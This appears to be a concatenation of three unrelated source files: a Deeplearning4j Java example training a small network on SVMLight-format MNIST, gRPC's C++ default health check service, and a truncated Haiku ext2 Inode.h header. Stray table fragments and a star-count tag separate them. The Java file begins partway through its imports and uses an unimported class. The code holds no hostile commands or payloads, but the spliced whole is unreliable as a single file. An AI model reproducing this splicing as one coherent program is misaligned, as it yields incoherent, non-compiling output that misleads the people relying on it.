import org.datavec.api.records.reader.impl.misc.SVMLightRecordReader;
import org.datavec.api.split.FileSplit;
import org.deeplearning4j.datapipelineexamples.utils.DownloaderUtility;
import org.deeplearning4j.datasets.datavec.RecordReaderDataSetIterator;
import org.deeplearning4j.nn.conf.MultiLayerConfiguration;
import org.deeplearning4j.nn.conf.NeuralNetConfiguration;
import org.deeplearning4j.nn.conf.WorkspaceMode;
import org.deeplearning4j.nn.conf.layers.DenseLayer;
import org.deeplearning4j.nn.conf.layers.OutputLayer;
import org.deeplearning4j.nn.multilayer.MultiLayerNetwork;
import org.deeplearning4j.nn.weights.WeightInit;
import org.deeplearning4j.optimize.listeners.ScoreIterationListener;
import org.nd4j.evaluation.classification.Evaluation;
import org.nd4j.linalg.activations.Activation;
import org.nd4j.linalg.api.ndarray.INDArray;
import org.nd4j.linalg.dataset.DataSet;
import org.nd4j.linalg.dataset.api.iterator.DataSetIterator;
import org.nd4j.linalg.learning.config.Adam;
import org.nd4j.linalg.lossfunctions.LossFunctions;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.File;
/**
 * Trains a small feed-forward network on an MNIST subset stored in SVMLight
 * format, demonstrating DataVec's {@link SVMLightRecordReader}.
 * Side effects: downloads the example data on first run and logs
 * training/evaluation progress.
 */
public class SVMLightExample {
    private static Logger log = LoggerFactory.getLogger(SVMLightExample.class);
    public static String dataLocalPath;
    public static void main(String[] args) throws Exception {
        int numOfFeatures = 784; // For MNIST data set, each row is a 1D expansion of a handwritten digits picture of size 28x28 pixels = 784
        int numOfClasses = 10; // 10 classes (types of senders) in the data set. Zero indexing. Classes have integer values 0, 1 or 2 ... 9
        int batchSize = 10; // 1000 examples, with batchSize is 10, around 100 iterations per epoch
        int printIterationsNum = 20; // print score every 20 iterations
        int hiddenLayer1Num = 200;
        long seed = 42;
        int nEpochs = 4;
        dataLocalPath = DownloaderUtility.DATAEXAMPLES.Download();
        // Tell the SVMLight reader how many features each row has and that
        // label indices in the files are zero-based.
        Configuration config = new Configuration();
        config.setBoolean(SVMLightRecordReader.ZERO_BASED_INDEXING, true);
        config.setInt(SVMLightRecordReader.NUM_FEATURES, numOfFeatures);
        // Train/test readers share the same reader configuration.
        SVMLightRecordReader trainRecordReader = new SVMLightRecordReader();
        trainRecordReader.initialize(config, new FileSplit(new File(dataLocalPath,"MnistSVMLightExample/mnist_svmlight_train_1000.txt")));
        DataSetIterator trainIter = new RecordReaderDataSetIterator(trainRecordReader, batchSize, numOfFeatures, numOfClasses);
        SVMLightRecordReader testRecordReader = new SVMLightRecordReader();
        testRecordReader.initialize(config, new FileSplit(new File(dataLocalPath,"MnistSVMLightExample/mnist_svmlight_test_100.txt")));
        DataSetIterator testIter = new RecordReaderDataSetIterator(testRecordReader, batchSize, numOfFeatures, numOfClasses);
        log.info("Build model....");
        // Two-layer MLP: 784 -> 200 (ReLU) -> 10-way softmax with NLL loss.
        MultiLayerConfiguration conf = new NeuralNetConfiguration.Builder()
            .seed(seed)
            .trainingWorkspaceMode(WorkspaceMode.ENABLED)
            .activation(Activation.RELU)
            .weightInit(WeightInit.XAVIER)
            .updater(Adam.builder().learningRate(0.02).beta1(0.9).beta2(0.999).build())
            .l2(1e-4)
            .list()
            .layer(new DenseLayer.Builder().nIn(numOfFeatures).nOut(hiddenLayer1Num)
                .build())
            .layer(new OutputLayer.Builder(LossFunctions.LossFunction.NEGATIVELOGLIKELIHOOD)
                .activation(Activation.SOFTMAX)
                .nIn(hiddenLayer1Num).nOut(numOfClasses).build())
            .build();
        //run the model
        MultiLayerNetwork model = new MultiLayerNetwork(conf);
        model.init();
        model.setListeners(new ScoreIterationListener(printIterationsNum));
        for ( int n = 0; n < nEpochs; n++) {
            model.fit(trainIter);
            log.info(String.format("Epoch %d finished training", n + 1));
            // evaluate the model on test data, once every second epoch
            if ((n + 1) % 2 == 0) {
                //evaluate the model on the test set
                Evaluation eval = new Evaluation(numOfClasses);
                testIter.reset();
                while(testIter.hasNext()) {
                    DataSet t = testIter.next();
                    INDArray features = t.getFeatures();
                    INDArray labels = t.getLabels();
                    INDArray predicted = model.output(features, false);
                    eval.eval(labels, predicted);
                }
                log.info(String.format("Evaluation on test data - [Epoch %d] [Accuracy: %.3f, P: %.3f, R: %.3f, F1: %.3f] ",
                    n + 1, eval.accuracy(), eval.precision(), eval.recall(), eval.f1()));
                log.info(eval.stats());
            }
        }
        System.out.println("Finished...");
    }
}
| 2,240 |
2,151 | /*
*
* Copyright 2016 gRPC authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
#include <memory>
#include <mutex>
#include <grpc/slice.h>
#include <grpc/support/alloc.h>
#include <grpc/support/log.h>
#include <grpcpp/impl/codegen/method_handler_impl.h>
#include "pb_decode.h"
#include "pb_encode.h"
#include "src/core/ext/filters/client_channel/health/health.pb.h"
#include "src/cpp/server/health/default_health_check_service.h"
namespace grpc {
//
// DefaultHealthCheckService
//
DefaultHealthCheckService::DefaultHealthCheckService() {
  // The empty service name represents the server's overall health; it starts
  // out SERVING so health checks succeed before any status is set explicitly.
  services_map_[""].SetServingStatus(SERVING);
}
// Records the serving state of |service_name|, creating its map entry on
// first use. Once the service has shut down, every update is forced to
// NOT_SERVING regardless of the requested value.
void DefaultHealthCheckService::SetServingStatus(
    const grpc::string& service_name, bool serving) {
  std::lock_guard<std::mutex> lock(mu_);
  // After shutdown the entry is still (re)created, but always as NOT_SERVING.
  const bool effectively_serving = serving && !shutdown_;
  services_map_[service_name].SetServingStatus(effectively_serving
                                                   ? SERVING
                                                   : NOT_SERVING);
}
// Sets every currently-registered service (including the overall "" entry)
// to SERVING or NOT_SERVING. No-op once Shutdown() has been called.
void DefaultHealthCheckService::SetServingStatus(bool serving) {
  const ServingStatus status = serving ? SERVING : NOT_SERVING;
  std::unique_lock<std::mutex> lock(mu_);
  if (shutdown_) {
    return;
  }
  for (auto& p : services_map_) {
    ServiceData& service_data = p.second;
    service_data.SetServingStatus(status);
  }
}
// Marks the database as shut down and pushes NOT_SERVING to every service,
// which also notifies all registered watch handlers. Idempotent.
void DefaultHealthCheckService::Shutdown() {
  std::unique_lock<std::mutex> lock(mu_);
  if (shutdown_) {
    return;
  }
  shutdown_ = true;
  for (auto& p : services_map_) {
    ServiceData& service_data = p.second;
    service_data.SetServingStatus(NOT_SERVING);
  }
}
// Returns the recorded status for |service_name|, or NOT_FOUND when no such
// service has ever been registered or set.
DefaultHealthCheckService::ServingStatus
DefaultHealthCheckService::GetServingStatus(
    const grpc::string& service_name) const {
  std::lock_guard<std::mutex> lock(mu_);
  const auto entry = services_map_.find(service_name);
  return entry == services_map_.end() ? NOT_FOUND
                                      : entry->second.GetServingStatus();
}
// Associates a Watch() call handler with |service_name| (creating the entry
// if needed) and immediately sends the current status to the new watcher.
void DefaultHealthCheckService::RegisterCallHandler(
    const grpc::string& service_name,
    std::shared_ptr<HealthCheckServiceImpl::CallHandler> handler) {
  std::unique_lock<std::mutex> lock(mu_);
  ServiceData& service_data = services_map_[service_name];
  service_data.AddCallHandler(handler /* copies ref */);
  // Grab the raw pointer first: |handler| is moved into SendHealth()'s
  // self-reference argument on the next line.
  HealthCheckServiceImpl::CallHandler* h = handler.get();
  h->SendHealth(std::move(handler), service_data.GetServingStatus());
}
// Removes |handler| from |service_name|'s watcher set, and erases the whole
// service entry once ServiceData::Unused() reports it is no longer needed.
void DefaultHealthCheckService::UnregisterCallHandler(
    const grpc::string& service_name,
    const std::shared_ptr<HealthCheckServiceImpl::CallHandler>& handler) {
  std::unique_lock<std::mutex> lock(mu_);
  auto it = services_map_.find(service_name);
  if (it == services_map_.end()) return;
  ServiceData& service_data = it->second;
  service_data.RemoveCallHandler(handler);
  if (service_data.Unused()) {
    services_map_.erase(it);
  }
}
// Creates the async service implementation bound to |cq|. Must be called at
// most once; ownership of the impl stays with this object (raw ptr returned).
DefaultHealthCheckService::HealthCheckServiceImpl*
DefaultHealthCheckService::GetHealthCheckService(
    std::unique_ptr<ServerCompletionQueue> cq) {
  GPR_ASSERT(impl_ == nullptr);
  impl_.reset(new HealthCheckServiceImpl(this, std::move(cq)));
  return impl_.get();
}
//
// DefaultHealthCheckService::ServiceData
//
// Stores the new status and fans it out to every registered watch handler.
void DefaultHealthCheckService::ServiceData::SetServingStatus(
    ServingStatus status) {
  status_ = status;
  for (auto& call_handler : call_handlers_) {
    call_handler->SendHealth(call_handler /* copies ref */, status);
  }
}
// Takes shared ownership of a watch handler for this service.
void DefaultHealthCheckService::ServiceData::AddCallHandler(
    std::shared_ptr<HealthCheckServiceImpl::CallHandler> handler) {
  call_handlers_.insert(std::move(handler));
}
// Drops this service's reference to |handler|, if present.
void DefaultHealthCheckService::ServiceData::RemoveCallHandler(
    const std::shared_ptr<HealthCheckServiceImpl::CallHandler>& handler) {
  call_handlers_.erase(handler);
}
//
// DefaultHealthCheckService::HealthCheckServiceImpl
//
namespace {
// Fully-qualified method names of the standard gRPC health checking protocol
// (grpc.health.v1.Health).
const char kHealthCheckMethodName[] = "/grpc.health.v1.Health/Check";
const char kHealthWatchMethodName[] = "/grpc.health.v1.Health/Watch";
}  // namespace
// Registers the Check (unary) and Watch (server-streaming) methods and
// creates — but does not yet start — the dedicated cq-polling thread.
DefaultHealthCheckService::HealthCheckServiceImpl::HealthCheckServiceImpl(
    DefaultHealthCheckService* database,
    std::unique_ptr<ServerCompletionQueue> cq)
    : database_(database), cq_(std::move(cq)) {
  // Add Check() method.
  AddMethod(new internal::RpcServiceMethod(
      kHealthCheckMethodName, internal::RpcMethod::NORMAL_RPC, nullptr));
  // Add Watch() method.
  AddMethod(new internal::RpcServiceMethod(
      kHealthWatchMethodName, internal::RpcMethod::SERVER_STREAMING, nullptr));
  // Create serving thread.
  thread_ = std::unique_ptr<::grpc_core::Thread>(
      new ::grpc_core::Thread("grpc_health_check_service", Serve, this));
}
DefaultHealthCheckService::HealthCheckServiceImpl::~HealthCheckServiceImpl() {
  // We will reach here after the server starts shutting down.
  shutdown_ = true;
  {
    // Shut the cq down under the lock so no handler can start a new
    // operation concurrently; Serve() then drains remaining tags and exits.
    std::unique_lock<std::mutex> lock(cq_shutdown_mu_);
    cq_->Shutdown();
  }
  thread_->Join();
}
// Seeds the first Check/Watch call handlers, then starts the polling thread.
void DefaultHealthCheckService::HealthCheckServiceImpl::StartServingThread() {
  // Request the calls we're interested in.
  // We do this before starting the serving thread, so that we know it's
  // done before server startup is complete.
  CheckCallHandler::CreateAndStart(cq_.get(), database_, this);
  WatchCallHandler::CreateAndStart(cq_.get(), database_, this);
  // Start serving thread.
  thread_->Start();
}
// Thread entry point: drains the completion queue, dispatching every tag to
// its CallableTag, until the queue is shut down by the destructor.
void DefaultHealthCheckService::HealthCheckServiceImpl::Serve(void* arg) {
  HealthCheckServiceImpl* service =
      reinterpret_cast<HealthCheckServiceImpl*>(arg);
  void* tag;
  bool ok;
  while (true) {
    if (!service->cq_->Next(&tag, &ok)) {
      // The completion queue is shutting down.
      GPR_ASSERT(service->shutdown_);
      break;
    }
    auto* next_step = static_cast<CallableTag*>(tag);
    next_step->Run(ok);
  }
}
// Parses a serialized grpc.health.v1.HealthCheckRequest out of |request| and
// stores the requested service name (or "" when unset) in |service_name|.
// Returns false if the buffer cannot be dumped or the protobuf fails to
// decode.
bool DefaultHealthCheckService::HealthCheckServiceImpl::DecodeRequest(
    const ByteBuffer& request, grpc::string* service_name) {
  std::vector<Slice> slices;
  if (!request.Dump(&slices).ok()) return false;
  uint8_t* request_bytes = nullptr;
  size_t request_size = 0;
  grpc_health_v1_HealthCheckRequest request_struct;
  request_struct.has_service = false;
  if (slices.size() == 1) {
    // Single slice: decode in place, no copy needed.
    request_bytes = const_cast<uint8_t*>(slices[0].begin());
    request_size = slices[0].size();
  } else if (slices.size() > 1) {
    // Multiple slices: flatten them into one contiguous buffer.
    request_bytes = static_cast<uint8_t*>(gpr_malloc(request.Length()));
    // BUG FIX: request_size was previously left at 0 in this branch, so
    // multi-slice requests were decoded from an empty stream and the service
    // name was silently dropped.
    request_size = request.Length();
    uint8_t* copy_to = request_bytes;
    for (size_t i = 0; i < slices.size(); i++) {
      memcpy(copy_to, slices[i].begin(), slices[i].size());
      copy_to += slices[i].size();
    }
  }
  pb_istream_t istream = pb_istream_from_buffer(request_bytes, request_size);
  bool decode_status = pb_decode(
      &istream, grpc_health_v1_HealthCheckRequest_fields, &request_struct);
  if (slices.size() > 1) {
    gpr_free(request_bytes);
  }
  if (!decode_status) return false;
  *service_name = request_struct.has_service ? request_struct.service : "";
  return true;
}
// Serializes a grpc.health.v1.HealthCheckResponse carrying |status| into
// |response|. Returns false if nanopb fails to encode.
bool DefaultHealthCheckService::HealthCheckServiceImpl::EncodeResponse(
    ServingStatus status, ByteBuffer* response) {
  grpc_health_v1_HealthCheckResponse response_struct;
  response_struct.has_status = true;
  response_struct.status =
      status == NOT_FOUND
          ? grpc_health_v1_HealthCheckResponse_ServingStatus_SERVICE_UNKNOWN
          : status == SERVING
                ? grpc_health_v1_HealthCheckResponse_ServingStatus_SERVING
                : grpc_health_v1_HealthCheckResponse_ServingStatus_NOT_SERVING;
  pb_ostream_t ostream;
  memset(&ostream, 0, sizeof(ostream));
  // First pass: a zeroed pb_ostream_t acts as a nanopb sizing stream, so
  // bytes_written tells us how large the real buffer must be.
  pb_encode(&ostream, grpc_health_v1_HealthCheckResponse_fields,
            &response_struct);
  grpc_slice response_slice = grpc_slice_malloc(ostream.bytes_written);
  // Second pass: encode for real into the slice sized above.
  ostream = pb_ostream_from_buffer(GRPC_SLICE_START_PTR(response_slice),
                                   GRPC_SLICE_LENGTH(response_slice));
  bool encode_status = pb_encode(
      &ostream, grpc_health_v1_HealthCheckResponse_fields, &response_struct);
  if (!encode_status) return false;
  Slice encoded_response(response_slice, Slice::STEAL_REF);
  ByteBuffer response_buffer(&encoded_response, 1);
  response->Swap(&response_buffer);
  return true;
}
//
// DefaultHealthCheckService::HealthCheckServiceImpl::CheckCallHandler
//
// Allocates a handler (kept alive by the shared_ptr captured in its own
// CallableTag) and asks the server for the next Check() call.
void DefaultHealthCheckService::HealthCheckServiceImpl::CheckCallHandler::
    CreateAndStart(ServerCompletionQueue* cq,
                   DefaultHealthCheckService* database,
                   HealthCheckServiceImpl* service) {
  std::shared_ptr<CallHandler> self =
      std::make_shared<CheckCallHandler>(cq, database, service);
  CheckCallHandler* handler = static_cast<CheckCallHandler*>(self.get());
  {
    std::unique_lock<std::mutex> lock(service->cq_shutdown_mu_);
    if (service->shutdown_) return;
    // Request a Check() call.
    handler->next_ =
        CallableTag(std::bind(&CheckCallHandler::OnCallReceived, handler,
                              std::placeholders::_1, std::placeholders::_2),
                    std::move(self));
    service->RequestAsyncUnary(0, &handler->ctx_, &handler->request_,
                               &handler->writer_, cq, cq, &handler->next_);
  }
}
// Plain member initialization; the handler becomes active in CreateAndStart().
DefaultHealthCheckService::HealthCheckServiceImpl::CheckCallHandler::
    CheckCallHandler(ServerCompletionQueue* cq,
                     DefaultHealthCheckService* database,
                     HealthCheckServiceImpl* service)
    : cq_(cq), database_(database), service_(service), writer_(&ctx_) {}
// Handles one Check() request end-to-end: decode, look up status, encode,
// then finish the call with either the response or an error status.
void DefaultHealthCheckService::HealthCheckServiceImpl::CheckCallHandler::
    OnCallReceived(std::shared_ptr<CallHandler> self, bool ok) {
  if (!ok) {
    // The value of ok being false means that the server is shutting down.
    return;
  }
  // Spawn a new handler instance to serve the next new client. Every handler
  // instance will deallocate itself when it's done.
  CreateAndStart(cq_, database_, service_);
  // Process request.
  gpr_log(GPR_DEBUG, "[HCS %p] Health check started for handler %p", service_,
          this);
  grpc::string service_name;
  grpc::Status status = Status::OK;
  ByteBuffer response;
  if (!service_->DecodeRequest(request_, &service_name)) {
    status = Status(StatusCode::INVALID_ARGUMENT, "could not parse request");
  } else {
    ServingStatus serving_status = database_->GetServingStatus(service_name);
    if (serving_status == NOT_FOUND) {
      status = Status(StatusCode::NOT_FOUND, "service name unknown");
    } else if (!service_->EncodeResponse(serving_status, &response)) {
      status = Status(StatusCode::INTERNAL, "could not encode response");
    }
  }
  // Send response.
  {
    std::unique_lock<std::mutex> lock(service_->cq_shutdown_mu_);
    if (!service_->shutdown_) {
      next_ =
          CallableTag(std::bind(&CheckCallHandler::OnFinishDone, this,
                                std::placeholders::_1, std::placeholders::_2),
                      std::move(self));
      if (status.ok()) {
        writer_.Finish(response, status, &next_);
      } else {
        writer_.FinishWithError(status, &next_);
      }
    }
  }
}
// Final callback for a Check() call; dropping |self| destroys the handler.
void DefaultHealthCheckService::HealthCheckServiceImpl::CheckCallHandler::
    OnFinishDone(std::shared_ptr<CallHandler> self, bool ok) {
  if (ok) {
    gpr_log(GPR_DEBUG, "[HCS %p] Health check call finished for handler %p",
            service_, this);
  }
  self.reset(); // To appease clang-tidy.
}
//
// DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler
//
// Allocates a watch handler, registers for the call's done notification, and
// asks the server for the next Watch() call. Two CallableTags each hold a
// shared_ptr to the handler, keeping it alive while operations are pending.
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
    CreateAndStart(ServerCompletionQueue* cq,
                   DefaultHealthCheckService* database,
                   HealthCheckServiceImpl* service) {
  std::shared_ptr<CallHandler> self =
      std::make_shared<WatchCallHandler>(cq, database, service);
  WatchCallHandler* handler = static_cast<WatchCallHandler*>(self.get());
  {
    std::unique_lock<std::mutex> lock(service->cq_shutdown_mu_);
    if (service->shutdown_) return;
    // Request AsyncNotifyWhenDone().
    handler->on_done_notified_ =
        CallableTag(std::bind(&WatchCallHandler::OnDoneNotified, handler,
                              std::placeholders::_1, std::placeholders::_2),
                    self /* copies ref */);
    handler->ctx_.AsyncNotifyWhenDone(&handler->on_done_notified_);
    // Request a Watch() call.
    handler->next_ =
        CallableTag(std::bind(&WatchCallHandler::OnCallReceived, handler,
                              std::placeholders::_1, std::placeholders::_2),
                    std::move(self));
    service->RequestAsyncServerStreaming(1, &handler->ctx_, &handler->request_,
                                         &handler->stream_, cq, cq,
                                         &handler->next_);
  }
}
// Plain member initialization; the handler becomes active in CreateAndStart().
DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
    WatchCallHandler(ServerCompletionQueue* cq,
                     DefaultHealthCheckService* database,
                     HealthCheckServiceImpl* service)
    : cq_(cq), database_(database), service_(service), stream_(&ctx_) {}
// Starts one Watch() stream: spawns the next handler, parses the request,
// and registers this handler with the database, which immediately pushes the
// current status to the client.
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
    OnCallReceived(std::shared_ptr<CallHandler> self, bool ok) {
  if (!ok) {
    // Server shutting down.
    //
    // AsyncNotifyWhenDone() needs to be called before the call starts, but the
    // tag will not pop out if the call never starts (
    // https://github.com/grpc/grpc/issues/10136). So we need to manually
    // release the ownership of the handler in this case.
    GPR_ASSERT(on_done_notified_.ReleaseHandler() != nullptr);
    return;
  }
  // Spawn a new handler instance to serve the next new client. Every handler
  // instance will deallocate itself when it's done.
  CreateAndStart(cq_, database_, service_);
  // Parse request.
  if (!service_->DecodeRequest(request_, &service_name_)) {
    SendFinish(std::move(self),
               Status(StatusCode::INVALID_ARGUMENT, "could not parse request"));
    return;
  }
  // Register the call for updates to the service.
  gpr_log(GPR_DEBUG,
          "[HCS %p] Health watch started for service \"%s\" (handler: %p)",
          service_, service_name_.c_str(), this);
  database_->RegisterCallHandler(service_name_, std::move(self));
}
// Queues |status| to the client, coalescing updates: at most one Write() is
// in flight; newer statuses overwrite |pending_status_| until it completes.
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
    SendHealth(std::shared_ptr<CallHandler> self, ServingStatus status) {
  std::unique_lock<std::mutex> lock(send_mu_);
  // If there's already a send in flight, cache the new status, and
  // we'll start a new send for it when the one in flight completes.
  if (send_in_flight_) {
    pending_status_ = status;
    return;
  }
  // Start a send.
  SendHealthLocked(std::move(self), status);
}
// Encodes |status| and starts the streaming Write(). Requires send_mu_ held
// by the caller; finishes the call instead if shutting down or encoding
// fails.
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
    SendHealthLocked(std::shared_ptr<CallHandler> self, ServingStatus status) {
  send_in_flight_ = true;
  // Construct response.
  ByteBuffer response;
  bool success = service_->EncodeResponse(status, &response);
  // Grab shutdown lock and send response.
  std::unique_lock<std::mutex> cq_lock(service_->cq_shutdown_mu_);
  if (service_->shutdown_) {
    SendFinishLocked(std::move(self), Status::CANCELLED);
    return;
  }
  if (!success) {
    SendFinishLocked(std::move(self),
                     Status(StatusCode::INTERNAL, "could not encode response"));
    return;
  }
  next_ = CallableTag(std::bind(&WatchCallHandler::OnSendHealthDone, this,
                                std::placeholders::_1, std::placeholders::_2),
                      std::move(self));
  stream_.Write(response, &next_);
}
// Completion of a streaming Write(); starts the next send if a newer status
// was coalesced while this one was in flight. NOT_FOUND doubles as the
// "no pending status" sentinel here.
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
    OnSendHealthDone(std::shared_ptr<CallHandler> self, bool ok) {
  if (!ok) {
    SendFinish(std::move(self), Status::CANCELLED);
    return;
  }
  std::unique_lock<std::mutex> lock(send_mu_);
  send_in_flight_ = false;
  // If we got a new status since we started the last send, start a
  // new send for it.
  if (pending_status_ != NOT_FOUND) {
    auto status = pending_status_;
    pending_status_ = NOT_FOUND;
    SendHealthLocked(std::move(self), status);
  }
}
// Finishes the stream with `status` unless Finish() was already sent or the
// service is shutting down.  Acquires the CQ shutdown lock itself.
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
    SendFinish(std::shared_ptr<CallHandler> self, const Status& status) {
  if (finish_called_) return;
  std::unique_lock<std::mutex> cq_lock(service_->cq_shutdown_mu_);
  if (service_->shutdown_) return;
  SendFinishLocked(std::move(self), status);
}
// Issues the Finish() on the stream.
// Precondition: service_->cq_shutdown_mu_ is held and shutdown_ is false.
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
    SendFinishLocked(std::shared_ptr<CallHandler> self, const Status& status) {
  // `self` keeps the handler alive until OnFinishDone() runs.
  on_finish_done_ =
      CallableTag(std::bind(&WatchCallHandler::OnFinishDone, this,
                            std::placeholders::_1, std::placeholders::_2),
                  std::move(self));
  stream_.Finish(status, &on_finish_done_);
  finish_called_ = true;
}
// Completion callback for Finish().  Dropping `self` here releases the last
// reference the completion queue held on this handler.
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
    OnFinishDone(std::shared_ptr<CallHandler> self, bool ok) {
  if (ok) {
    gpr_log(GPR_DEBUG,
            "[HCS %p] Health watch call finished (service_name: \"%s\", "
            "handler: %p).",
            service_, service_name_.c_str(), this);
  }
  self.reset();  // To appease clang-tidy.
}
// TODO(roth): This method currently assumes that there will be only one
// thread polling the cq and invoking the corresponding callbacks.  If
// that changes, we will need to add synchronization here.
// Invoked when the call is done (client cancelled or call completed);
// unregisters the watcher and finishes the stream.
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
    OnDoneNotified(std::shared_ptr<CallHandler> self, bool ok) {
  GPR_ASSERT(ok);
  gpr_log(GPR_DEBUG,
          "[HCS %p] Health watch call is notified done (handler: %p, "
          "is_cancelled: %d).",
          service_, this, static_cast<int>(ctx_.IsCancelled()));
  // Unregister before finishing so no further SendHealth() calls arrive.
  database_->UnregisterCallHandler(service_name_, self);
  SendFinish(std::move(self), Status::CANCELLED);
}
} // namespace grpc
| 6,747 |
1,338 | <gh_stars>1000+
/*
* Copyright 2011, <NAME>, <EMAIL>.
* Copyright 2008, <NAME>, <EMAIL>.
* This file may be used under the terms of the MIT License.
*/
#ifndef INODE_H
#define INODE_H
#include <fs_cache.h>
#include <lock.h>
#include <string.h>
#include "ext2.h"
#include "Volume.h"
//#define TRACE_EXT2
#ifdef TRACE_EXT2
# define TRACEI(x...) dprintf("\33[34mext2:\33[0m " x)
#else
# define TRACEI(x...) ;
#endif
// In-memory representation of one on-disk ext2/ext3/ext4 inode.  Wraps the
// raw ext2_inode data, provides read/write access to the file's data stream,
// and participates in block-cache transactions via TransactionListener.
class Inode : public TransactionListener {
public:
						Inode(Volume* volume, ino_t id);
						~Inode();

			status_t	InitCheck();

			ino_t		ID() const { return fID; }

			rw_lock*	Lock() { return &fLock; }
			// Write-locks the inode for the duration of the transaction.
			void		WriteLockInTransaction(Transaction& transaction);

			status_t	UpdateNodeFromDisk();
			status_t	WriteBack(Transaction& transaction);

			recursive_lock&	SmallDataLock() { return fSmallDataLock; }

			// Node-type predicates based on the inode's POSIX mode bits.
			bool		IsDirectory() const
							{ return S_ISDIR(Mode()); }
			bool		IsFile() const
							{ return S_ISREG(Mode()); }
			bool		IsSymLink() const
							{ return S_ISLNK(Mode()); }
			status_t	CheckPermissions(int accessMode) const;

			bool		IsDeleted() const { return fUnlinked; }
			bool		HasExtraAttributes() const
							{ return fHasExtraAttributes; }
			// True if this directory uses htree (hashed) indexing.
			bool		IsIndexed() const
						{ return fVolume->IndexedDirectories()
							&& (Flags() & EXT2_INODE_INDEXED) != 0; }

			mode_t		Mode() const { return fNode.Mode(); }
			int32		Flags() const { return fNode.Flags(); }

			off_t		Size() const { return fNode.Size(); }
			// Timestamp accessors; the extra-attribute flag selects the
			// extended (nanosecond / creation-time) on-disk fields.
			void		GetChangeTime(struct timespec *timespec) const
						{ fNode.GetChangeTime(timespec, fHasExtraAttributes); }
			void		GetModificationTime(struct timespec *timespec) const
						{ fNode.GetModificationTime(timespec,
							fHasExtraAttributes); }
			void		GetCreationTime(struct timespec *timespec) const
						{ fNode.GetCreationTime(timespec,
							fHasExtraAttributes); }
			void		GetAccessTime(struct timespec *timespec) const
						{ fNode.GetAccessTime(timespec, fHasExtraAttributes); }
			void		SetChangeTime(const struct timespec *timespec)
						{ fNode.SetChangeTime(timespec, fHasExtraAttributes); }
			void		SetModificationTime(const struct timespec *timespec)
						{ fNode.SetModificationTime(timespec,
							fHasExtraAttributes); }
			void		SetCreationTime(const struct timespec *timespec)
						{ fNode.SetCreationTime(timespec,
							fHasExtraAttributes); }
			void		SetAccessTime(const struct timespec *timespec)
						{ fNode.SetAccessTime(timespec, fHasExtraAttributes); }
			void		IncrementNumLinks(Transaction& transaction);

			//::Volume* _Volume() const { return fVolume; }
			Volume*		GetVolume() const { return fVolume; }

			// Maps a file offset to a filesystem block (optionally returning
			// the number of contiguous blocks in *_count).
			status_t	FindBlock(off_t offset, fsblock_t& block,
							uint32 *_count = NULL);
			status_t	ReadAt(off_t pos, uint8 *buffer, size_t *length);
			status_t	WriteAt(Transaction& transaction, off_t pos,
							const uint8* buffer, size_t* length);
			status_t	FillGapWithZeros(off_t start, off_t end);

			status_t	Resize(Transaction& transaction, off_t size);

			ext2_inode&	Node() { return fNode; }

			status_t	InitDirectory(Transaction& transaction, Inode* parent);

			status_t	Unlink(Transaction& transaction);

			static	status_t	Create(Transaction& transaction, Inode* parent,
							const char* name, int32 mode, int openMode,
							uint8 type, bool* _created = NULL,
							ino_t* _id = NULL, Inode** _inode = NULL,
							fs_vnode_ops* vnodeOps = NULL,
							uint32 publishFlags = 0);
			// Converts a microsecond bigtime_t into a timespec.
			static	void	_BigtimeToTimespec(bigtime_t time,
							struct timespec *timespec)
						{ timespec->tv_sec = time / 1000000LL;
							timespec->tv_nsec = (time % 1000000LL) * 1000; }

			void*		FileCache() const { return fCache; }
			void*		Map() const { return fMap; }
			status_t	CreateFileCache();
			void		DeleteFileCache();
			bool		HasFileCache() { return fCache != NULL; }
			status_t	EnableFileCache();
			status_t	DisableFileCache();

			status_t	Sync();

			// Metadata checksum helpers (ext4 metadata_csum feature).
			void		SetDirEntryChecksum(uint8* block, uint32 id, uint32 gen);
			void		SetDirEntryChecksum(uint8* block);
			void		SetExtentChecksum(ext2_extent_stream* stream);
			bool		VerifyExtentChecksum(ext2_extent_stream* stream);

protected:
	virtual	void		TransactionDone(bool success);
	virtual	void		RemovedFromTransaction();

private:
						Inode(Volume* volume);
						Inode(const Inode&);
						Inode &operator=(const Inode&);
							// no implementation

			status_t	_EnlargeDataStream(Transaction& transaction,
							off_t size);
			status_t	_ShrinkDataStream(Transaction& transaction,
							off_t size);

			uint64		_NumBlocks();
			status_t	_SetNumBlocks(uint64 numBlocks);

			uint32		_InodeChecksum(ext2_inode* inode);

			ext2_dir_entry_tail*	_DirEntryTail(uint8* block) const;
			uint32		_DirEntryChecksum(uint8* block, uint32 id,
							uint32 gen) const;

			uint32		_ExtentLength(ext2_extent_stream* stream) const;
			uint32		_ExtentChecksum(ext2_extent_stream* stream) const;

			rw_lock		fLock;
			::Volume*	fVolume;
			ino_t		fID;
			void*		fCache;
			void*		fMap;
			bool		fUnlinked;
			bool		fHasExtraAttributes;
			ext2_inode	fNode;
			uint32		fNodeSize;
				// Inodes have a variable size, but the important
				// information is always the same size (except in ext4)
			status_t	fInitStatus;
			mutable recursive_lock fSmallDataLock;
};
// The Vnode class provides a convenience layer upon get_vnode(), so that
// you don't have to call put_vnode() anymore, which may make code more
// readable in some cases
class Vnode {
public:
	Vnode(Volume* volume, ino_t id)
		:
		fInode(NULL)
	{
		SetTo(volume, id);
	}

	Vnode()
		:
		fStatus(B_NO_INIT),
		fInode(NULL)
	{
	}

	~Vnode()
	{
		// RAII: releases the vnode reference acquired via get_vnode().
		Unset();
	}

	status_t InitCheck()
